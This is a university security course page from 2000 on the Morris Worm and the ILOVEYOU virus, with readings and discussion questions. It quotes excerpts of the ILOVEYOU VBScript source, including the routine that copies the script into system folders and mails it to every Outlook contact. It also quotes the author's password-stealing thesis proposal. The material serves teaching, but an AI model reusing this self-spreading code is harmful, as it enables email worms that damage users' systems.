CS551: Security and Privacy on the Internet, Fall 2000 |
Manifest: Monday 30 October 2000
Assignments Due 8 November Project Progress Reports
Work Right Now
With your nearby classmates, fill in as much as possible of the following table, highlighting the most important differences.
Morris Worm, 1988 Melissa/ILoveYou, 1999 Vulnerabilities Exploited Replication Strategy Smart Things Author Did Dumb Things Author Did Damage Caused Response Outcome Other Interesting Differences
Readings
Read before 1 November:
Optional additional reading (you will need to read at least one of these for Problem Set 4):
- Gary McGraw and Greg Morrisett, Attacking Malicious Code: A Report to the Infosec Research Council, IEEE Software, September/October 2000. (PostScript)
Each of these papers describes recent work on systems that constrain the behavior of untrusted code. A question on Problem Set 4 will ask you to evaluate one of these systems in terms of the eight design principles in the Saltzer and Schroeder paper (p. 7 - 8). It is recommended that you read the abstract for each of these on-line, and print out and read the entire paper for the one or more that seem most interesting.
- David Evans and Andrew Twyman, Flexible Policy-Directed Code Safety. IEEE Symposium on Security and Privacy, Oakland, California, May 9-12, 1999.
- Li Gong, M. Mueller, H. Prafullchandra, and R. Schemers. Going Beyond the Sandbox: An Overview of the New Security Architecture in the Java Development Kit 1.2. Proceedings of the USENIX Symposium on Internet Technologies and Systems, Monterey, California, December 1997.
- George Necula, Proof-Carrying Code. ACM Symposium on Principles of Programming Language, 1997.
- Dan S. Wallach, Dirk Balfanz, Drew Dean and Edward W. Felten. Extensible Security Architectures for Java. ACM Symposium on Operating Systems Principles, October 1997.
-$10B Program rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow ... sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub ... sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub ...(328 total lines)
Links Anti-Virus Companies
- James Gleick on the ILOVEYOU virus
- Onel de Guzman's rejected Thesis Proposal. Excerpt:
REASON FOR STUDY:The researcher decided to develop this program because the researcher believes that it will be helpful to a lot of people specially Internet users to get Windows passwords such as Internet Accounts to spend more time on Internet without paying.
IMPORTANCE OF THE STUDY:
The importance of the study is to help other people most especially Windows users. We all know that when we connect to the Internet we spend more time for surfing and reading email only, so when we are spending time we spend lots of money to pay the accounts for only using a couple of hours. So this program is the main solution, use it to steal and retrieve Internet accounts of the victim's computer.
POSSIBLE BENEFICIARIES:
The researcher will benefit all Windows Internet users from beginners to professional because this software is free to all. The main idea of this software is to cached and retrieved all lose passwords that users can enjoy it.
- Onel de Guzman's (non) Punishment, CBS, 21 August 2000.
- Melissa Plea Agreement
- Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988 - Another account of the Morris Worm incident; focuses on story of how the worm was analyzed and removed.
- Bulfinch's Account of the Trojan War
- Chenxi Wang, John Knight and Matthew Elder. On Computer Viral Infection and the Effect of Immunization, UVA-CS-99-32. A more realistic model for virus propagation.
- Quisquater, J. J., Guillou, L. C., Annick, M. and Berson, T. A. How to Explain Zero Knowledge Proofs to Your Children (or hapless Trick-or-Treaters), CRYPTO '89. (Attached to this manifest.)
Questions Normal people learn from their errors. Microsoft users apparently belong to another category.
- What are viruses, worms and Trojan horses?
- What would happen if smart people wrote viruses today? (see Worst Nightmares Come Alive and I don't think I really love you (or writting internet worms for fun and profit) for a few ideas)
- What changes between 1988 and 2000 effect the propagation of and damage caused by malicious code?
- How can buffer overflows be exploited by malicious code? How can we make it harder?
- How do virus scanners work?
- Why are virus scanners more or less useless today?
- What is a zero-knowledge proof?
- How can Peggy convince Victor she knows something without revealing what it is?
Charles Bueche (quoted in 'ILOVEYOU' worm turns to States)
University of Virginia Department of Computer Science CS 551: Security and Privacy on the Internet |
David Evans evans@virginia.edu |